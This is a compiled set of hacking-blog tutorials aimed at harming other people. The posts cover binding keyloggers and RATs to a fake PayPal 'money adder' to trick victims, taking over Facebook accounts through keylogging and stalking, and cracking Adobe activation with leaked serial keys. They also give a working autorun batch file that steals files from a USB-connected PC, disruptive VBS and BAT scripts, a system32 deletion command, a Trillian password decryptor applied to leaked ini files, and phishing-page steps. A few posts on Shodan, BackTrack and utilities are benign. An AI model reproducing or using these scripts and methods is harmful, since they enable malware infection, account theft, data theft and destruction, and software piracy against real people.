How to Hack PayPal Accounts using PayPal Hacking Software

In this article i will show you how to hack PayPal accounts using PayPal hacking software.
Note: Hacking credit cards or Bank accounts like PayPal is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
This is fake PayPal Money Adder software to help you bind your keylogger or whatever Trojan server you have. This PayPal Money Adder software seems to be used to Add some Money to your PayPal Account, but actually this is fake PayPal Money Adder software used only as means for installing Trojan Server binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server
1. Download link of Fake PayPal Money Adder is HERE
2. PayPal Money Adder is free fake application which appears to hack PayPal Accounts, now run .exe application to see something like this:

Note: PayPal Money Adder is a FAKE application. It doesn’t add any money to your PayPal Account. It is only used to fool victim and to bind your Trojan server.
3. When you open this, there is a TextBox to type your PayPal Email, and you have to select how much money you want to Add. After that, click on Send Money, and Progress Bar will start.
4. When Progress Bar is full, it will says “Money Has Been Added to your Account Successfully “ as in the Picture below, but it wont add any money to your Account !!!

5. So that is one fake PayPal Money Adder, not one real !!!
6. Now create a keylogger or whatever server (like stealer or RAT), crypt it, and bind with this application. You can use Shock Labs File Binder or Easy Binder. You can find some binders on this blog, just search for it !!!
7. Now, send this binded PayPal Money Adder to your victim and tell him this PayPal Money Adder is used to Add Money to PayPal Accounts. You can use Social Engineering for this. So as long as he runs PayPal Money Adder on his computer, your keylogger server is installed on his computer.
8. Many other Fake Hacking Tools are coming soon, like AlertPay Money Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and other!!!

Bypassing Facebook Security to Hack Facebook Account Passwords

Ok, here’s a new quick tutorial for everyone who has been having to deal with Facebook blocking your entrance into someone’s account due to logging in from a different location.
Ever since I had been problems constantly having to deal with Facebook leaving me out off people’s accounts I began to think that I should write over my experiences to help others.
I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.
1. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.
If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, Keylogging, or Social Engineering.
2. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.
3. You will need to use your brain to think and have patience. If you don’t have either a brain to think or the patience to wait, please don’t continue reading this tutorial because you will not get any success.
Ok, let’s move on to the actual information.
-This method is a cheap shot method, but you never know if it might work or not.
1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.
You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.
2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the slave use your computer. Gain their trust to the point of where they can log in to different websites.
You can say for instance “My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?”
And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say “Oh, there we go! It worked”
Now, you will attempt to log in in the future and the problem of Logging in from another location will disappear.
3. Let’s say that they aren’t stupid enough to use your computer to log in, you might think, what then? Well, here’s my next suggestion to you.
Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.
Here’s what you do:
Watch and study your slave, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend’s house, etc…
Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.
4. So, you don’t have the choice of either offering your computer as a trap or the chance to “stalk” your slave. You wonder, what do I do then?
Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.
Here’s what Facebook did, in case if you don’t already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.

If you don’t recognize any of those people, you’re screwed.
When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn’t attempt to change the passwords, but if you do try, here’s what I would recommend to you.
-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.
If you do not know the person, you can use websites like:

• www.com.lullar.com
• www.pipl.com

To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person’s name manually by going to Myspace, Facebook, etc…To see who they have added as friends.
Your next step will be to add a friend of the slave or the slave directly. Adding the slave directly would probably be the best plan because you would have access directly to all the victims’ friends and their pictures.
Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.
If you don’t want to change their passwords, you can mask the slave’s IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.
A quick method I will suggest to you is to send the slave an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.
Mask their IP and facebook will not give you the problem of Logging in from another location.
If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won’t be able to do crap.
Their security is strong, but good ol’ Social engineering never fails.
Do you have questions, comments, or suggestions? Feel free to post a comment!

Search Engine for Hackers

A new search engine has been introduced called “SHODAN” that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.

Web search engines, such as Google and Bing, are great for finding websites. But what if you’re interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don’t let you answer those questions.
Following things could be searched for:

• country: 2-letter country code
• hostname: full or partial host name
• net: IP range using CIDR notation (ex: 18.7.7.0/24 )
• port: 21, 22, 23 or 80

As we [some of us] can understand, it is very easy to find vulnerable host just by looking at all the banner responses shown by SHODAN. It could turn out to be a huge threat as many skiddies could be scanning hosts anonymously round the clock for particular exploit or something that they understand well.
Click here to go to SHODAN
Do you have questions, comments, or suggestions? Feel free to post a comment!

The Best Operating System for Hackers

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.
Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is an easy access to software that facilitates exploitations of secure system. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!
Major Features
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!
What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

• Based on: Debian, Ubuntu
• Origin: Switzerland
• Architecture: i386
• Desktop: Fluxbox, KDE
• Category: Forensics, Rescue, Live Medium
• Cost: Free

Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:

• Metasploit integration
• RFMON Injection capable wireless drivers
• Kismet
• Nmap
• Ettercap
• Wireshark (formerly known as Ethereal)
• BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:

• Information Gathering
• Network Mapping
• Vulnerability Identification
• Web Application Analysis
• Radio Network Analysis (802.11, Bluetooth, Rfid)
• Penetration (Exploit & Social Engineering Toolkit)
• Privilege Escalation
• Maintaining Access
• Digital Forensics
• Reverse Engineering
• Voice Over IP

Download and Documents:

• Home Page
• User Forums
• Documentation
• Download Mirrors

Do you have questions, comments, or suggestions? Feel free to post a comment!

Lock Your Windows 7 PC with a Transparent Screen Over

I don’t know why you might need this but its definitely better than using the Logon screen ( + L). In fact you can have a look what’s happening behind even if your desktop screen is locked.

ClearLock is a transparent screen locker aimed to make the computer tech/system admin’s live easier by providing a way to disable input to a computer while still allowing you to see what is going on. It is completely portable an can be run in a PE environment or on a live system without leaving anything behind.

• Download ClearLock: Link

ClearLock is not a security system. its purpose is to keep meddling users from screwing with the computer when you are fixing it. It will not keep your computer/data safe from someone who is determined to get at it.

WinMate: Free System Optimizer for Slow PC Problems in Windows

One way to improve computer performance and speed of your PC is now easy! You can probably start with inadequate Windows settings which shouldn’t be ignored. Otherwise, the configuration errors can cause your computer into a draggy mess.

T55 WinMate : Free System Tweaker, Optimizer for Windows

WinMate is a free program that uses the latest technology to scan your computer and find all errors. After that, it gives you confidence solutions. In addition, WinMate also offers a wide range of great value and security software for computer optimization. With the upscale features, you can stay away from potential threats and clean the system errors to reduce accidents equipment, freezing and blue screen.

The program scans for various factors that determine slowdowns and system crashes. These include update checks, error registry entries, invalid files, Internet Explorer risk elements and improper system settings. Next, it gives a mark for the computer. Features and benefits:
T55 WinMate can identify computer potential risk by one-click scan. It scans all types of factors which slowdown your computer and cause constant system crashes. The scan contents are error registry entries, Windows update check, invalid files, improper system setting, IE risk item and more. Finally, T55 WinMate will give your computer a mark.

Fix slow computer

Do you have troubles with speed up your computer? How to avoid system crash? WinMate provide you four classical and effective methods to perfect your computer with only a few of clicks.

• Automatically Scan registry and repair the error items WinMate detect for you.
• Scans and fixes your Windows system errors, protect your Windows system from crashing, freezing and blue screen problem. Register DLL & File Association & Duplicate files scan & Invalid file remove.
• WinMate checks up your hard disk and find the fragments which prevents computer from running smoothly. Disk defragment rearranges and physically organizes the contents on your Hard Disk to fix slow computer.
• Memory Tweak utility recover the memory to free up it.

It makes your PC run faster without causing any instability of your system.

Fix slow Startup

Do you notice your computer is no longer faster as before? By cleanning startup programs and disabling service, you can recovery the optimum boot time. T55 WinMate lists all the startup and sevice by details. You can safely remove them in several setps with our recommend.

IE Tools

IE Tools comprises a host of rich built-in utilities to guarantee a better and healthier environment of your IE browser. Plugin Manager is a professional toolkit to help you remove malicious plugins which slow your computer. IE Restore: IE Restore utility allows to restore all the original settings of your IE. Check up your LSP to ensure better performance of your Internet Explorer.

System Tools

T55 WinMate provides user batch of usefull tools such like File Wiper, Drive immuner, Program Uninstall and so on. You can gain convenience from General Tool.

Computer Security Protect

T55 WinMate runs a series of Protection measures to keep your computer from risk. Disk immune disable AutoRun function. It effectively prevent virus from attacking. Timely download Windows updates and fix vulnerabilities. Clean up all IE history traces including cache, password and cookie. So that your Online bank info and personal privacy will not be used by spyware publisher.

Easy to use and free for ever

User-friendly Interface and step-by-step guide make it easy to use. Start Your Scan Now! You neither receive AD pop ups nor additional stuff. Your privacy will be protected and your email is never published nor shared.

Get Detailed Data Analysis Report of Your Facebook Friends, Activity

Facebook Spectrum is a free online application utilizing Facebook APIs and social graph to provide you a birds eye view of all your friends on facebook. You will need to be logged in to Facebook to access this application.

• Go to facebookspectrum.com

In the timeline section, we see all the status updates and Wall talks, both our own and any of our friends. This part is mainly intended to discover in a moment or suspicious activity that went unnoticed.
A useful section is that of the birthday, which shows a calendar with birthdays all highlighted, and a list of who and how many meet each month. With Geolocation, we can see in Google Maps the location of all our friends, no matter what city or area they are in.

A very good section devoted to photos, which you may know who has a large number of albums and photos, plus easy access to viewing the albums of any friend by creating a pie chart showing the top 10 of your friends with the most number of album
Finally, we know what gender, male or female or other, is prevalent among our community, and to discover what things we like mutually among our friends.

Crack Adobe Products With Notepad

This very short tutorial or tip that will show you how to hack photoshop or any other adobe software, you will need a serial key that is generated through a keygen or http://www.serials.ws/ when installing, next go to:
C:\Windows\System32\drivers\etc
Do this before installation!
Find a file named “hosts”, right click it and “edit” paste this text completely:
# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 pagead2.googlesyndication.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
What to do if the “hosts” file is invisible:
* Go to folder options in the control panel and then view hidden folders
Note:-
NEVER register the product or you will most certainly get blocked
You May Use These Black Listed Keys
1325-1449-6781-7659-0393-3886
1325-1009-9542-4206-2571-1821
1325-1669-8978-0838-9142-5258
1325-1110-3587-1378-2512-5113
1325-1485-7575-6892-8980-2789
1325-1351-8493-5126-5063-2659
1325-1180-0975-6327-5927-7027
1325-1318-5855-0146-4316-2971
1325-1089-7510-0925-1754-1759
1325-1916-2561-6219-3580-7611
1325-1342-6295-1372-0690-8009
1325-1884-3525-3192-5355-8786
1325-1978-5904-9353-5360-7627
1325-1164-1632-4494-2722-8482
1325-1519-2548-8290-3544-1865
1325-1991-4924-6752-2176-8168
1325-1738-2955-4811-5315-0359
1325-1558-2481-7578-1265-3812
1325-1485-4253-9130-7614-5497
1325-1763-8748-4339-3347-4635

How to Steal people files using usb drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

How To Hack Your Facebook Account with Greasemonkey & Javascript

Facebook is pretty awesome, but it is far from perfect. More than once, I’ve heard complaints about some of Facebook’s technical aspects. Sadly, Facebook isn’t open-sourced, so users can’t change anything themselves – or can they?
By using simple pieces of Javascript code, or by applying Firefox Greasemonkey userscripts, users can change the appearance and workings of Facebook themselves.
Learn how to hack Facebook accounts for fun, or tweak something useful. Believe me, it really is all in your hands.

Facebook Account Javascript Hacks

In these following hacks we’ll be using basic Javascript to toy around with Facebook. Note that we’re not going to hack into Facebook accounts, or anything of the like. Most of these ‘hacks’ are temporary and will disappear once you refresh the page. They also won’t be visible to users on other computers. So why are we doing it? – Because it’s fun!

These Javascript snippets, which we’ll supply below, simply need to be pasted into the address bar. Hit enter, et voila!

Changing Profile Colour

This will change the colour of your Facebook bar to a color of choice.

Just paste the following code in your address bar and hit enter. You can replace ‘red’ with any color you want – black, white, green or even orrange. If you want to reverse the effect, press Ctrl+F5 for a hard reload of the page.
javascript:void(document.getElementById('fb_menubar').style.background='red');

View Chat History with Offline Friends

Unfortunately, you can’t normally view the chat history of online friends. If you’re trying to remember something that was said, waiting for them to come back online is one hell of a bother. Instead, you can just use this – pretty useful – Javascript hack.
First of all, we need to get your friend’s Facebook ID. When you visit his page indirectly (through your friends list or by using the search engine), you’ll be able to see it as a number in the address bar.

Another way to retrieve someone’s ID is by going to the Friends widget on their page, and right-clicking See All. Then you’ll have to copy the link location and paste it in your address bar.

Once you’ve got someone’s ID, simply paste the following code in your address bar, replacing 1122334455 with
the relevant number.
javascript:buddyList.itemOnClick(1122334455);

Other Javascript hacks

The preceding two hacks are without doubt the most impressive or useful ones. Below are some of the other tricks you can pull off by using Javascript. We’re not going to deep on this because they’re all things you can do manually as well.
Change chat status to invisible:
javascript:statusControl.sendVisibility(false);
Change chat status to visible:
javascript:statusControl.sendVisibility(true);
Close all chat windows with person 1122334455:
javascript:chatDisplay.tabs[1122334455].tabXOnClick();
Open application tab:
javascript:applicationDock.toggleTab();
Bring up notifications:
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
Bring up friends list:
javascript:buddyList.toggleTab();

Facebook Greasemonkey Hacks

Greasemonkey is one of the best firefox add-ons in existence. By using ‘userscripts’, you can customize nearly every website. Read more about Greasemonkey in .
Today we won’t be focusing too hard on Greasemonkey itself, but on some of the great Facebook-specific userscripts.
Facebook Auto-login – One of the simplest, but perhaps also one of the most useful userscripts you’ll find. This one will automatically log into Facebook, as long as Firefox remembers your password, saving you a lot of hassle.
Auto-Colorizer for Facebook – This script will recolor your Facebook page by applying the color scheme of the most dominant picture currently showing on the page. As you can imagine, this can create some exciting, and also ambient effects.
FacebookDeletes – If you want to get rid of a lot of people at once, this is your man. This script can bulk delete friends, making the masacre all the easier.
Remove All Facebook Ads – Adblock still tends to miss a lot of Facebook ads. This script, frequently updated, will remove all thinkable Facebook ads, creating a completely click-safe Facebook environment.
External Apps Blocker – One of the most irritating things on Facebook are the abundance of quizzes, quote generators, and the like. Filtering all external app ‘stories’ from your homepage will be a lot easier if you use this script.
Want some more? Userscripts hosts 1112 Facebook related userscripts at the time of writing. Check it out and have a blast!
If you know any other cool Javascript tweaks, or Greasemonkey hacks, feel free to mention them in the comments section below!

10 Virus Notepad Script

All this comand use to type in notepad
1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Hack Passwords using Limewire…

1. Download LimeWire and install it (Reboot computer if needed)
The newest verion of LimeWire is here:
Code:
http://www.limewire.com/download/index.php
2. Open “Notepad”
3. Copy and Paste the following code into Notepad
Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = “243,038,129,196,057,134,219,146,113,163,185,230,0 83,122,149,” & _
“124,000,000,000,000,000,000,255,000,000,128,000,0 00,000,128,” & _
“128,000,255,000,000,000,128,000,128,000,128,128,0 00,000,000,” & _
“128,255,000,128,000,255,000,128,128,128,000,085,1 10,097,098,” & _
“108,101,032,116,111,032,114,101,115,111,108,118,1 01,032,072,” & _
“084,084,080,032,112,114,111,120,000″
keys = split(key, “,”)
main()
sub main()
pwd = “”
pwd = inputbox(“Enter the Encrypted Trillian Password”, “”, “”)
if pwd = “” then exit sub
pwd = trim(pwd)
pwdl = len(pwd)/2
redim pwds(pwdl-1)
for x = 0 to ubound(pwds)
‘msgbox mid(pwd,(x * 2)+1,2)
pwds(x) = int(“&h” & mid(pwd,(x * 2)+1,2))
next
if ubound(pwds) > ubound(keys) then
maxval = ubound(keys)
else
maxval = ubound(pwds)
end if
for x = 0 to maxval
goods = goods & chr(pwds(x) xor keys(x))
next
inputbox “Decrypted Password”,”",goods
end sub
4. Select FILE and choose SAVE AS
5. From the “Save as Type” drop-down menu select “All Files (*.*)”
6. Save the file as “TrillianPass.vbs” in the desired folder. Remember it’s location.
7. Start LimeWire
8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini
9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.
10. Open the downloaded file in Notepad.
11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.
12. Open the file that was created earlier: TrillianPass.vbs
13. Paste the encryped password into the Trillian Password Cracker and press “OK” to reveal the real password
14. How this works:
The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program’s preferences are set to share a whole drive instead of just one or two folders .

Change Your IP…

1. Click on “Start” in the bottom left hand corner of screen
2. Click on “Run”
3. Type in “command” and hit ok
You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”
5. Type “exit” and leave the prompt
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”
You should now be on a screen with something titled “Local Area Connection”, or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on “Local Area Connection” and click “properties”
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab
10. Click on “Use the following IP address” under the “General” tab
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here
14. Hit the “Ok” button again
You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings
17. This time, select “Obtain an IP address automatically”
tongue.gif 18. Hit “Ok”
19. Hit “Ok” again
20. You now have a new IP address
do at ur own risk
Tushar.

Making a Virus to destroy your victim’s pc…

Hi Guys! I m here explain to make a file that destroys u r victims pc I m not responsible for the damage caused by this file.
1. Open Notepad
2. write the above command : -del c:\WINDOWS\system32\**/q
3. Save the above notepad with the extension “.bat or .cmd” as u want[For e.g : File -> Save As -> Type abhi.bat or aaa.cmd
4. ??????????????? Attention !!!!!!!!!!!!!!!!

!!!!!!Don’t double click the file otherwise u r in trouble.
becoz the file u created delete all files from ursystem32 folder and  when u restart ur pc it will not startbcz system can not find the files in the system32 folder whichis required at the time of booting.
5. You can also test the above by creating a fake folder let supposewindows1 in C:\.
Copy some old files in it and just follow theabove command.By double clicking the bat
or cmd file ur all filesautomaitcally get deleted.6. You can try this file in any one`s
computer.(but this result in causing damage to the computer, so thik again before
trying this on anyone’s pc)

Make Your Own Phishing Site

Hello Friends
Tired Of Searching For Those Phishing Files
How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps
Here Is The Tutorial
1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.
2. When You Found Your Site Right Click On It And Say “view source” And Save It On Desktop As index.html
3. Open The “index.htm” With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action=”RANDOM URL” method=”post”
4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method
Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page
5. Save index.html
11. Save This File write.php, And Upload It To The Subdomain Aswell
12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,
ENJOY!!!!
